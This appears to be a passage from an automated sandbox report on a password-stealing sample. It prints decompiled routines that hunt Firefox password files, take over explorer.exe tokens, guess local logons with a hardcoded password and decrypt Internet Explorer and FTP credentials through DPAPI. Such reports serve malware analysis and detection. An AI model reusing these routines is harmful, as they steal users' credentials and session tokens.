                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
                                                                          • Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
                                                                          • Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                                        • String ID: *.*$\*.*$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                                                        • API String ID: 3040542784-1405255088
                                                                        • Opcode ID: 21b12ee9a0ac83c949ae5836015204b49b1158e9b7e439ffb12c41c9bead4261
                                                                        • Instruction ID: b663840663784a3fe1e581d68bb3c28c37a014c69344c9f8a2cf847aa5b90957
                                                                        • Opcode Fuzzy Hash: 21b12ee9a0ac83c949ae5836015204b49b1158e9b7e439ffb12c41c9bead4261
                                                                        • Instruction Fuzzy Hash: 77514F71510109BADF226F62DC02AEE7A79AF54308F1444BBB408B50F2D67E9DE09E5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 65%
                                                                        			E00402C05(void* __eax, void* __edx, intOrPtr _a4) {
                                                                        				void* _v8;
                                                                        				void* _v12;
                                                                        				intOrPtr _v16;
                                                                        				char _v276;
                                                                        				long _v304;
                                                                        				void* _v312;
                                                                        				void* _v316;
                                                                        				int _v320;
                                                                        				int _v324;
                                                                        				void* _t33;
                                                                        				int _t36;
                                                                        				void* _t44;
                                                                        				void* _t47;
                                                                        				int* _t56;
                                                                        				void* _t60;
                                                                        				int _t64;
                                                                        
                                                                        				if( *0x4143d1 == 0 ||  *0x4143d5 == 0 ||  *0x41440d == 0 ||  *0x414411 == 0) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t60 = 0;
                                                                        					_v16 =  *0x4143d1();
                                                                        					_v312 = 0x128;
                                                                        					_t33 = CreateToolhelp32Snapshot(2, 0);
                                                                        					if(_t33 != 0xffffffff) {
                                                                        						_v316 = _t33;
                                                                        						_t36 = Process32First(_v316,  &_v312);
                                                                        						while(_t36 != 0) {
                                                                        							if(StrStrIA( &_v276, "explorer.exe") == 0) {
                                                                        								L23:
                                                                        								_t36 = Process32Next(_v316,  &_v312);
                                                                        								continue;
                                                                        							} else {
                                                                        								_v320 = 0;
                                                                        								_t44 =  *0x4143d5(_v304,  &_v320);
                                                                        								_t64 = _v320;
                                                                        								if(_t44 == 0 || _t64 != _v16) {
                                                                        									goto L23;
                                                                        								} else {
                                                                        									_t47 = OpenProcess(0x2000000, 0, _v304);
                                                                        									if(_t47 == 0) {
                                                                        										goto L23;
                                                                        									} else {
                                                                        										_v12 = _t47;
                                                                        										if(OpenProcessToken(_v12, 0x201eb,  &_v8) == 0) {
                                                                        											CloseHandle(_v12);
                                                                        											goto L23;
                                                                        										} else {
                                                                        											if(ImpersonateLoggedOnUser(_v8) == 0) {
                                                                        												CloseHandle(_v8);
                                                                        												CloseHandle(_v12);
                                                                        												goto L23;
                                                                        											} else {
                                                                        												_t60 = _t60 + 1;
                                                                        												_v324 = 0;
                                                                        												_t56 =  &_v324;
                                                                        												_push(_t56);
                                                                        												_push(0xf003f);
                                                                        												L00410E12();
                                                                        												if(_t56 == 0 && _v324 != 0) {
                                                                        													_push(_v324);
                                                                        													_pop( *0x4140fe);
                                                                        												}
                                                                        												if(_a4 != 0) {
                                                                        													_push(_v8);
                                                                        													_pop( *__eax);
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						CloseHandle(_v316);
                                                                        					}
                                                                        					return _t60;
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                        • WTSGetActiveConsoleSessionId.KERNEL32(?,?,00410B93,00410C2C), ref: 00402C42
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00402C59
                                                                        • Process32First.KERNEL32 ref: 00402C7A
                                                                        • StrStrIA.SHLWAPI(?,explorer.exe,?,00000128,00000002,00000000), ref: 00402C93
                                                                        • ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,00000128,?,explorer.exe,?,00000128,00000002,00000000), ref: 00402CB7
                                                                        • OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402CE1
                                                                        • OpenProcessToken.ADVAPI32(00410B93,000201EB,00410C2C,02000000,00000000,?), ref: 00402CFD
                                                                        • ImpersonateLoggedOnUser.ADVAPI32(00410C2C), ref: 00402D0A
                                                                        • RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402D2B
                                                                        • CloseHandle.KERNEL32(?,?,00000128,00000002,00000000), ref: 00402D90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: OpenProcess$SessionUser$ActiveCloseConsoleCreateCurrentFirstHandleImpersonateLoggedProcess32SnapshotTokenToolhelp32
                                                                        • String ID: explorer.exe

                                                                        C-Code - Quality: 88%
                                                                        			E0041098D(signed int __eax, void* __ecx, signed int __edx) {
                                                                        				void* _v8;
                                                                        				CHAR* _v12;
                                                                        				char _v16;
                                                                        				CHAR* _v20;
                                                                        				CHAR* _v24;
                                                                        				CHAR* _v28;
                                                                        				void* _v32;
                                                                        				void* _v36;
                                                                        				char _v40;
                                                                        				char _v44;
                                                                        				char _v48;
                                                                        				char _t46;
                                                                        				char _t50;
                                                                        				char _t54;
                                                                        				char _t57;
                                                                        				char _t59;
                                                                        				char _t65;
                                                                        				int _t68;
                                                                        				char _t69;
                                                                        				char _t70;
                                                                        				void* _t71;
                                                                        				signed int _t73;
                                                                        				signed int _t74;
                                                                        				CHAR* _t75;
                                                                        
                                                                        				_t71 = __ecx;
                                                                        				_t73 = __edx ^ __eax;
                                                                        				_t42 = __eax ^ _t73;
                                                                        				_t74 = _t73 ^ __eax ^ _t73;
                                                                        				if( *0x414411 == 0 ||  *0x41441d == 0) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t69 =  *0x417691; // 0x6dcfa0
                                                                        					while(1) {
                                                                        						_t70 = _t69;
                                                                        						__eflags = _t70;
                                                                        						if(_t70 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						E00402AF8(_t42, _t74);
                                                                        						__eflags =  *0x417695;
                                                                        						if( *0x417695 == 0) {
                                                                        							L7:
                                                                        							_v8 = 0;
                                                                        							_t46 = LogonUserA( *(_t70 + 4), 0,  *(_t70 + 4), 2, 0,  &_v8);
                                                                        							__eflags = _t46;
                                                                        							if(_t46 == 0) {
                                                                        								_v12 = E0040294B( *(_t70 + 4));
                                                                        								_t50 = LCMapStringA(0x400, 0x100,  *(_t70 + 4), lstrlenA( *(_t70 + 4)), _v12, _t49);
                                                                        								__eflags = _t50;
                                                                        								if(_t50 == 0) {
                                                                        									L12:
                                                                        									E004017D5(_v12);
                                                                        									_t75 = "samantha";
                                                                        									L13:
                                                                        									_v8 = 0;
                                                                        									_t54 = LogonUserA( *(_t70 + 4), 0, _t75, 2, 0,  &_v8);
                                                                        									__eflags = _t54;
                                                                        									if(_t54 != 0) {
                                                                        										goto L14;
                                                                        									}
                                                                        								} else {
                                                                        									_v8 = 0;
                                                                        									_t65 = LogonUserA( *(_t70 + 4), 0, _v12, 2, 0,  &_v8);
                                                                        									__eflags = _t65;
                                                                        									if(_t65 == 0) {
                                                                        										goto L12;
                                                                        									} else {
                                                                        										E004017D5(_v12);
                                                                        										goto L14;
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								L14:
                                                                        								_v44 = 0x20;
                                                                        								_v40 = 1;
                                                                        								 *_t23 =  *(_t70 + 4);
                                                                        								 *_t25 =  *((intOrPtr*)(_t70 + 8));
                                                                        								_v28 = 0;
                                                                        								_v24 = 0;
                                                                        								_v20 = 0;
                                                                        								_v16 = 0;
                                                                        								_t57 =  &_v44;
                                                                        								_push(_t57);
                                                                        								_push(_v8);
                                                                        								L00410E96();
                                                                        								__eflags = _t57;
                                                                        								if(_t57 == 0) {
                                                                        									_v48 = 0;
                                                                        								} else {
                                                                        									__eflags = _v16;
                                                                        									if(_v16 != 0) {
                                                                        										_push(_v16);
                                                                        										_pop( *0x4140fe);
                                                                        									}
                                                                        									_v48 = 1;
                                                                        								}
                                                                        								_t59 = ImpersonateLoggedOnUser(_v8);
                                                                        								_t60 = _t59;
                                                                        								__eflags = _t59;
                                                                        								if(__eflags != 0) {
                                                                        									E004105CE(_t60, _t71, _t74, __eflags);
                                                                        									__eflags =  *0x414409;
                                                                        									if( *0x414409 != 0) {
                                                                        										RevertToSelf();
                                                                        									}
                                                                        									 *0x4140fe = 0x80000001;
                                                                        								}
                                                                        								__eflags = _v48;
                                                                        								if(_v48 != 0) {
                                                                        									_push(_v16);
                                                                        									_push(_v8);
                                                                        									L00410E9C();
                                                                        								}
                                                                        								CloseHandle(_v8);
                                                                        							}
                                                                        							asm("cld");
                                                                        							_t42 = 0;
                                                                        							_t71 = 0xffffffff;
                                                                        							asm("repne scasb");
                                                                        							__eflags =  *_t75;
                                                                        							if( *_t75 != 0) {
                                                                        								goto L13;
                                                                        							}
                                                                        						} else {
                                                                        							_t68 = lstrcmpiA( *0x417695,  *(_t70 + 4));
                                                                        							_t42 = _t68;
                                                                        							__eflags = _t68;
                                                                        							if(_t68 != 0) {
                                                                        								goto L7;
                                                                        							} else {
                                                                        							}
                                                                        						}
                                                                        						_t69 =  *_t70;
                                                                        					}
                                                                        					return 1;
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                        • lstrcmpiA.KERNEL32(?), ref: 004109D5
                                                                        • LogonUserA.ADVAPI32(?,00000000,?,00000002,00000000,00000000), ref: 004109FA
                                                                        • lstrlenA.KERNEL32(?,?), ref: 00410A17
                                                                        • LCMapStringA.KERNEL32(00000400,00000100,?,00000000,?,00000000,?,?), ref: 00410A2E
                                                                        • LogonUserA.ADVAPI32(?,00000000,?,00000002,00000000,00000000), ref: 00410A4E
                                                                        • LoadUserProfileA.USERENV(00000000,00000020,?,?), ref: 00410ACF
                                                                        • ImpersonateLoggedOnUser.ADVAPI32(00000000,00000000,00000020,?,?), ref: 00410AFA
                                                                        • RevertToSelf.ADVAPI32 ref: 00410B12
                                                                        • UnloadUserProfile.USERENV(00000000,00000000), ref: 00410B2E
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00410B36
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: User$LogonProfile$CloseHandleImpersonateLoadLoggedRevertSelfStringUnloadlstrcmpilstrlen
                                                                        • String ID: $H$j$samantha
                                                                        • API String ID: 1348396137-1985755575
                                                                        • Opcode ID: e8c680e9c729fbd071ccc07f1bc87b888f040c63c80d600780040c0011251876
                                                                        • Instruction ID: 97e36a9f464fd7594aaf26f4fe361f5543e1ef418d0b81fc890e2415056c999a
                                                                        • Opcode Fuzzy Hash: e8c680e9c729fbd071ccc07f1bc87b888f040c63c80d600780040c0011251876
                                                                        • Instruction Fuzzy Hash: 54516E71A00208EFEF119FA1DD46BDEBA75EB04318F14C066E510A91E2D7F99AD0DF29
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E0040A1A9(intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                        				char _v1028;
                                                                        				char _v2052;
                                                                        				int _v2056;
                                                                        				int _v2060;
                                                                        				intOrPtr _v2064;
                                                                        				char _v2068;
                                                                        				char _v2072;
                                                                        				char _v2076;
                                                                        				void* _v2080;
                                                                        				char _v2084;
                                                                        				void* _v2088;
                                                                        				char _v2092;
                                                                        				intOrPtr _v2096;
                                                                        				void* _t53;
                                                                        				int _t58;
                                                                        
                                                                        				E00409EFB(_a4,  &_v1028, _a20);
                                                                        				WideCharToMultiByte(0, 0, _a12, 0xffffffff,  &_v2052, 0x3ff, 0, 0);
                                                                        				_v2068 = 0x10;
                                                                        				_v2064 = 2;
                                                                        				_v2060 = 0;
                                                                        				_v2056 = 0;
                                                                        				_t53 =  *((intOrPtr*)( *_a20 + 0x44))(_a20, 0, _a4, _a8, _a12,  &_v2076,  &_v2072,  &_v2068, 0);
                                                                        				if(_v2076 == 0 || _v2072 == 0) {
                                                                        					return _t53;
                                                                        				}
                                                                        				_v2096 = 0xbeef0000;
                                                                        				if(lstrcmpiA( &_v1028, "Internet Explorer") == 0) {
                                                                        					L5:
                                                                        					_t58 = StrStrIA( &_v2052, "DPAPI: ");
                                                                        					if(_t58 == 0) {
                                                                        						_t58 = E0040A13B(_v2096, _a12, _v2072, _v2076, _a16);
                                                                        					} else {
                                                                        						if( *0x41442d != 0) {
                                                                        							_push(_v2076);
                                                                        							_pop( *_t29);
                                                                        							_push(_v2072);
                                                                        							_pop( *_t31);
                                                                        							_t58 =  *0x41442d( &_v2084, 0, 0, 0, 0, 1,  &_v2092);
                                                                        							if(_t58 != 0) {
                                                                        								E0040A13B(_v2096, _a12, _v2088, _v2092, _a16);
                                                                        								_t58 = LocalFree(_v2088);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					L11:
                                                                        					_push(_v2072);
                                                                        					L00410DCA();
                                                                        					return _t58;
                                                                        				}
                                                                        				_v2096 = 0xbeef0001;
                                                                        				if(lstrcmpiA( &_v1028, "WininetCacheCredentials") == 0) {
                                                                        					goto L5;
                                                                        				}
                                                                        				_v2096 = 0xbeef0002;
                                                                        				_t58 = lstrcmpiA( &_v1028, "MS IE FTP Passwords");
                                                                        				if(_t58 != 0) {
                                                                        					goto L11;
                                                                        				}
                                                                        				goto L5;
                                                                        			}



















                                                                        APIs
                                                                          • Part of subcall function 00409EFB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F34
                                                                          • Part of subcall function 00409EFB: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F3D
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A1DD
                                                                        • lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0040A267
                                                                        • lstrcmpiA.KERNEL32(?,WininetCacheCredentials,?,Internet Explorer), ref: 0040A286
                                                                        • lstrcmpiA.KERNEL32(?,MS IE FTP Passwords,?,WininetCacheCredentials,?,Internet Explorer), ref: 0040A2A5
                                                                        • StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A2BE
                                                                        • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A304
                                                                        • LocalFree.KERNEL32(?), ref: 0040A331
                                                                        • CoTaskMemFree.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 0040A35B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Freelstrcmpi$ByteCharMultiTaskWide$CryptDataLocalUnprotect
                                                                        • String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
                                                                        • API String ID: 2957877119-3076635702
                                                                        • Opcode ID: 5149302b925e7ebfd9dfd41346574a285818239cdaffdd8d8b8ec34254ad70c1
                                                                        • Instruction ID: d0109d7229b507364c02bffd69db74d2b73ca55b941890eea464c4d2f255e551
                                                                        • Opcode Fuzzy Hash: 5149302b925e7ebfd9dfd41346574a285818239cdaffdd8d8b8ec34254ad70c1
                                                                        • Instruction Fuzzy Hash: CE415E7240021DEADF219F50CC42FDA77B9BF08304F0480E6B64475190DB759AE58FD9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E0040BA2E(void* __eax, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
                                                                        				int _v8;
                                                                        				char _v12;
                                                                        				char _v16;
                                                                        				int _v20;
                                                                        				char _v24;
                                                                        				char _v28;
                                                                        				int _v32;
                                                                        				char _v36;
                                                                        				void* _v40;
                                                                        				void* _v44;
                                                                        				char _v48;
                                                                        				void* _v52;
                                                                        				int _v56;
                                                                        				char* _v60;
                                                                        				void* _t55;
                                                                        				void* _t56;
                                                                        				int _t77;
                                                                        				int _t78;
                                                                        
                                                                        				_t55 = __eax;
                                                                        				if(_a16 == 0 ||  *0x41442d == 0) {
                                                                        					return _t55;
                                                                        				} else {
                                                                        					_t56 = _a16;
                                                                        					__eflags =  *0x41914c - _t56; // 0x0
                                                                        					if(__eflags < 0) {
                                                                        						__eflags =  *0x419150 - _t56; // 0x5
                                                                        						if(__eflags < 0) {
                                                                        							__eflags =  *0x419154 - _t56; // 0x3
                                                                        							if(__eflags < 0) {
                                                                        								E0040B1AB(_a12,  *0x41914c,  &_v8,  &_v12,  &_v16);
                                                                        								E0040B1AB(_a12,  *0x419154,  &_v20,  &_v24,  &_v28);
                                                                        								E0040B1AB(_a12,  *0x419150,  &_v32,  &_v36,  &_v40);
                                                                        								_push(_v32);
                                                                        								_pop( *_t16);
                                                                        								_push(_v40);
                                                                        								_pop( *_t18);
                                                                        								_v52 = 0;
                                                                        								_t56 =  *0x41442d( &_v48, 0, 0, 0, 0, 1,  &_v56);
                                                                        								__eflags = _t56;
                                                                        								if(_t56 != 0) {
                                                                        									__eflags = _v52;
                                                                        									if(_v52 != 0) {
                                                                        										__eflags = _v56 - _v32;
                                                                        										if(_v56 <= _v32) {
                                                                        											asm("cld");
                                                                        											asm("jecxz 0x4");
                                                                        											memcpy(_v40, _v52, _v56);
                                                                        											_push(_v56);
                                                                        											_pop( *_t29);
                                                                        											_t56 = LocalFree(_v52);
                                                                        											__eflags = _v8;
                                                                        											if(_v8 != 0) {
                                                                        												__eflags = _v20;
                                                                        												if(_v20 != 0) {
                                                                        													__eflags = _v32;
                                                                        													if(_v32 != 0) {
                                                                        														_v60 = E004017EC(_v8);
                                                                        														E00401823(_v16, _v60, _v8);
                                                                        														_t77 = StrCmpNIA(_v60, "ftp://", lstrlenA("ftp://"));
                                                                        														__eflags = _t77;
                                                                        														if(_t77 != 0) {
                                                                        															_t77 = StrCmpNIA(_v60, "http://", lstrlenA("http://"));
                                                                        														}
                                                                        														_t78 = _t77;
                                                                        														__eflags = _t78;
                                                                        														if(_t78 != 0) {
                                                                        															_t78 = StrCmpNIA(_v60, "https://", lstrlenA("https://"));
                                                                        														}
                                                                        														__eflags = _t78;
                                                                        														if(_t78 == 0) {
                                                                        															E00401486(_a8, _a20);
                                                                        															E00401486(_a8,  *0x419148);
                                                                        															E004014BC(_a8, _v16, _v8);
                                                                        															E004014BC(_a8, _v28, _v20);
                                                                        															E004014BC(_a8, _v40, _v32);
                                                                        														}
                                                                        														return E004017D5(_v60);
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					return _t56;
                                                                        				}
                                                                        			}






















                                                                        APIs
                                                                        • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040BAE5
                                                                        • LocalFree.KERNEL32(00000000,?), ref: 0040BB20
                                                                        • lstrlenA.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB61
                                                                        • StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB6F
                                                                        • lstrlenA.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB7D
                                                                        • StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB8B
                                                                        • lstrlenA.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB99
                                                                        • StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBA7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$CryptDataFreeLocalUnprotect
                                                                        • String ID: ftp://$http://$https://
                                                                        • API String ID: 3968356742-2804853444
                                                                        • Opcode ID: 95c9bc2d148bde0b4b59229255769488340ea3422c61917c09e4e27456b1ab44
                                                                        • Instruction ID: bf0502dff25623896b3ecf7b6da0d74d92ec6f4b9260b97e51de09929ef1935b
                                                                        • Opcode Fuzzy Hash: 95c9bc2d148bde0b4b59229255769488340ea3422c61917c09e4e27456b1ab44
                                                                        • Instruction Fuzzy Hash: 9E51E772900209FBDF12AF91ED45EEE7B7AEB48314F108136F510B11A1D7799A90EB98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 38%
                                                                        			E00402C05(void* __eax, void* __edx, intOrPtr _a4) {
                                                                        				void* _v8;
                                                                        				void* _v12;
                                                                        				intOrPtr _v16;
                                                                        				char _v276;
                                                                        				long _v304;
                                                                        				void* _v312;
                                                                        				void* _v316;
                                                                        				int _v320;
                                                                        				int _v324;
                                                                        				void* _t33;
                                                                        				int _t36;
                                                                        				void* _t44;
                                                                        				void* _t47;
                                                                        				int* _t56;
                                                                        				void* _t60;
                                                                        				int _t64;
                                                                        
                                                                        				if( *0x4143d1 == 0 ||  *0x4143d5 == 0 ||  *0x41440d == 0 ||  *0x414411 == 0) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t60 = 0;
                                                                        					_v16 =  *0x4143d1();
                                                                        					_v312 = 0x128;
                                                                        					_t33 = CreateToolhelp32Snapshot(2, 0);
                                                                        					if(_t33 != 0xffffffff) {
                                                                        						_v316 = _t33;
                                                                        						_t36 = Process32First(_v316,  &_v312);
                                                                        						while(_t36 != 0) {
                                                                        							if(StrStrIA( &_v276, "explorer.exe") == 0) {
                                                                        								L23:
                                                                        								_t36 = Process32Next(_v316,  &_v312);
                                                                        								continue;
                                                                        							} else {
                                                                        								_v320 = 0;
                                                                        								_t44 =  *0x4143d5(_v304,  &_v320);
                                                                        								_t64 = _v320;
                                                                        								if(_t44 == 0 || _t64 != _v16) {
                                                                        									goto L23;
                                                                        								} else {
                                                                        									_t47 = OpenProcess(0x2000000, 0, _v304);
                                                                        									if(_t47 == 0) {
                                                                        										goto L23;
                                                                        									} else {
                                                                        										_v12 = _t47;
                                                                        										_push( &_v8);
                                                                        										_push(0x201eb);
                                                                        										_push(_v12);
                                                                        										if( *0x41440d() == 0) {
                                                                        											CloseHandle(_v12);
                                                                        											goto L23;
                                                                        										} else {
                                                                        											_push(_v8);
                                                                        											if( *0x414411() == 0) {
                                                                        												CloseHandle(_v8);
                                                                        												CloseHandle(_v12);
                                                                        												goto L23;
                                                                        											} else {
                                                                        												_t60 = _t60 + 1;
                                                                        												_v324 = 0;
                                                                        												_t56 =  &_v324;
                                                                        												_push(_t56);
                                                                        												_push(0xf003f);
                                                                        												L00410E12();
                                                                        												if(_t56 == 0 && _v324 != 0) {
                                                                        													_push(_v324);
                                                                        													_pop( *0x4140fe);
                                                                        												}
                                                                        												if(_a4 != 0) {
                                                                        													_push(_v8);
                                                                        													_pop( *__eax);
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						CloseHandle(_v316);
                                                                        					}
                                                                        					return _t60;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00402C59
                                                                        • Process32First.KERNEL32 ref: 00402C7A
                                                                        • StrStrIA.SHLWAPI(?,explorer.exe,?,00000128,00000002,00000000), ref: 00402C93
                                                                        • OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402CE1
                                                                        • RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402D2B
                                                                        • CloseHandle.KERNEL32(?,?,00000128,00000002,00000000), ref: 00402D90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Open$CloseCreateCurrentFirstHandleProcessProcess32SnapshotToolhelp32User
                                                                        • String ID: explorer.exe
                                                                        • API String ID: 2079391467-3187896405
                                                                        • Opcode ID: d7b33712bffa344649a6c7b91db19c6665e4b5ef021c38cbfc5ccfe492207028
                                                                        • Instruction ID: ccbd0d7988a87a0baa37139996db17261bf584517116b24148bb5ef45f8ddf5c
                                                                        • Opcode Fuzzy Hash: d7b33712bffa344649a6c7b91db19c6665e4b5ef021c38cbfc5ccfe492207028
                                                                        • Instruction Fuzzy Hash: 15418B72900218ABDF219F61DD4ABDE7AB5AF04304F0085B6A104B51E1EBFC9ED1DE58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00408789(void* __ecx, intOrPtr _a4, char* _a8, char* _a12) {
                                                                        				struct _WIN32_FIND_DATAA _v324;
                                                                        				void* _v328;
                                                                        				CHAR* _v332;
                                                                        				char* _v336;
                                                                        				char* _t36;
                                                                        				signed int _t38;
                                                                        				CHAR* _t40;
                                                                        				void* _t44;
                                                                        				char* _t47;
                                                                        				int _t50;
                                                                        				int _t52;
                                                                        				int _t55;
                                                                        				signed int _t57;
                                                                        				void* _t59;
                                                                        				void* _t68;
                                                                        				signed int* _t69;
                                                                        
                                                                        				_t68 = __ecx;
                                                                        				_v332 = 0;
                                                                        				_t36 = _a8;
                                                                        				if(_t36 == 0 ||  *_t36 == 0) {
                                                                        					L20:
                                                                        					return E004017D5(_v332);
                                                                        				} else {
                                                                        					_t38 = E004024D7(_a8);
                                                                        					__eflags = _t38;
                                                                        					if(_t38 != 0) {
                                                                        						_t40 = E00401D15(_a8, "*.*");
                                                                        					} else {
                                                                        						_t40 = E00401D15(_a8, "\*.*");
                                                                        					}
                                                                        					_v332 = _t40;
                                                                        					E00401803( &_v324, 0x13e);
                                                                        					_t44 = FindFirstFileA(_v332,  &_v324);
                                                                        					_v328 = _t44;
                                                                        					__eflags = _t44 + 1;
                                                                        					if(_t44 + 1 != 0) {
                                                                        						do {
                                                                        							_t69 =  &_v324;
                                                                        							__eflags =  *_t69 & 0x00000010;
                                                                        							if(( *_t69 & 0x00000010) == 0) {
                                                                        								_v336 =  &(_t69[0xb]);
                                                                        								_t47 = StrStrIA(_v336, _a12);
                                                                        								__eflags = _t47;
                                                                        								if(_t47 != 0) {
                                                                        									E00408744(_t69, __eflags, _a4, E00401D69(E00401D15(_a8, "\\"), _v336));
                                                                        									E004017D5(_t65);
                                                                        								}
                                                                        							} else {
                                                                        								_t52 = lstrcmpiA(0x414806,  &(_t69[0xb]));
                                                                        								__eflags = _t52;
                                                                        								if(_t52 != 0) {
                                                                        									_t55 = lstrcmpiA(0x414808,  &( &_v324->cFileName));
                                                                        									__eflags = _t55;
                                                                        									if(_t55 != 0) {
                                                                        										_t57 = E004024D7(_a8);
                                                                        										__eflags = _t57;
                                                                        										if(_t57 != 0) {
                                                                        											_t59 = E00401D15(_a8, 0);
                                                                        										} else {
                                                                        											_t59 = E00401D15(_a8, "\\");
                                                                        										}
                                                                        										E00408789(_t68, _a4, E00401D69(_t59,  &( &_v324->cFileName)), _a12);
                                                                        										E004017D5(_t60);
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							_t50 = FindNextFileA(_v328,  &_v324);
                                                                        							__eflags = _t50;
                                                                        						} while (_t50 != 0);
                                                                        						FindClose(_v328);
                                                                        					}
                                                                        					goto L20;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 004087F9
                                                                        • lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00408822
                                                                        • lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 0040883F
                                                                        • FindNextFileA.KERNEL32(?,?,?,?,00000000,?,?,0000013E,?,*.*,?), ref: 004088E6
                                                                        • FindClose.KERNEL32(?,?,?,?,?,00000000,?,?,0000013E,?,*.*,?), ref: 004088F9
